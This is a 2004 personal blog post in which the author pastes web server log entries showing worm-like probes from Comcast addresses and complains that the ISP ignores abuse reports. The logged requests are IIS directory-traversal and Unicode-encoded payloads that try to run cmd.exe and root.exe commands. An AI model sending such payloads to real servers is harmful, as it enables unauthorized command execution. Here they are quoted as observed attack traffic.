A Quark of A Different Spin. (adameros) wrote,
A Quark of A Different Spin.
adameros

In someways it was better when I was running my webserver through the IP tunnel on port 8080. As it is, I am getting about a 100 hits a day looking like:


211.21.75.99 - - [23/May/2004:15:51:25 -0700] "GET /scripts/nsiislog.dll" 404 1049 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:17 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:18 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:19 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:20 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:20 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:21 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:22 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:23 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:24 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:24 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:25 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:26 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:26 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:27 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:28 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:29 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
67.164.214.74 - - [23/May/2004:16:51:30 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"

They all come from comcast IP's. As I'm on comcast I'm guessing it's people running ISS who have been infected with a worm, and that worm is looking to spread through the local broadband network.

You tell comcast that there are people posing a security risk on the network, complete with address, date, and time, so they can tell exactly who the people are, and they don't seem to notify the infected people or even respond to my e-mails. Even an e-mail in response saying, "we can't do anything about it," is better than the silent treatment.
Subscribe
  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your IP address will be recorded 

  • 3 comments